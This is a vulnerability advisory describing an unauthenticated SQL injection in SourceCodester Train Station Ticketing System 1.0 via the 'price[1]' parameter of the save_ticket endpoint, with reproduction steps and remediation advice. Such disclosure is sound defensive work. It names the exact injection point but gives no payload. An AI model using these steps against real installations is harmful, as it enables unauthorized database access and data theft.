SourceCodester Train Station Ticketing System SQL Injection Vulnerability

A SQL injection vulnerability has been identified in SourceCodester Train Station Ticketing System version 1.0. The issue arises in the file '/ajax.php?action=save_ticket', where user input from the 'price[1]' parameter is not properly validated or sanitized before being used in SQL queries. This lack of input validation allows attackers to inject malicious SQL code, potentially leading to unauthorized database access, data manipulation, and exposure of sensitive information. The vulnerability can be exploited remotely, without any authentication.

Impact

Exploitation of this vulnerability allows for SQL injection, enabling attackers to interfere with the application's database queries. This could lead to unauthorized data access, data manipulation, and in some cases, executing administrative operations on the database.

Reproduction

To reproduce this vulnerability, send a POST request to '/ajax.php?action=save_ticket' with the 'price[1]' parameter included. Inject a malicious SQL payload, such as a time-based blind SQL injection command, into the 'price[1]' parameter. The application will execute the injected SQL code, demonstrating the SQL injection vulnerability.

Remediation

It is recommended to use prepared statements and parameter binding to prevent SQL injection vulnerabilities. Additionally, implement input validation and filtering to ensure user input conforms to expected formats. Regular security audits can help identify and address potential vulnerabilities.